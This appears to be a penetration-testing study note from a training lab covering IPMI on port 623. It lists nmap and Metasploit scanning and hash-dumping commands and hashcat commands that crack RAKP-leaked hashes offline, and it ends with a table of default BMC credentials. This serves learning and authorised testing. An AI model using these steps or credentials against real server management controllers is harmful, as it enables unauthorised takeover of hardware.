IPMI (623)

Footprinting using NMAP

sudo nmap -sU --script ipmi-version -p 623 ilo.inlanfreight.local

Metasploit version scan

use auxiliary/scanner/ipmi/ipmi_version

Flaw in RAKP protocol in IPMI 2.0

• the server will send an MD5/SHA1 (salted) to the client which can be cracked offline Cracking using hashcat (HP iLO default password)

hashcat -m 7300 ipmi.txt -a 3 ?1?1?1?1?1?1?1?1 -1 ?d?u

Cracking using hashcat (input wordlist)

hashcat -m 7300 ipmi.txt /usr/share/wordlists/rockyou.txt

Metasploit dumping hashes

use auxiliary/scanner/ipmi/ipmi_dumphashes 

After cracking, we can now login to the baseboard management controller (BMC)

Notes:

port 623 (UDP)

Default passwords

Product	Username	Password
Dell iDRAC	root	calvin
HP iLO	Administrator	randomized 8-character string consisting of numbers and uppercase letters
Supermicro IPMI	ADMIN	ADMIN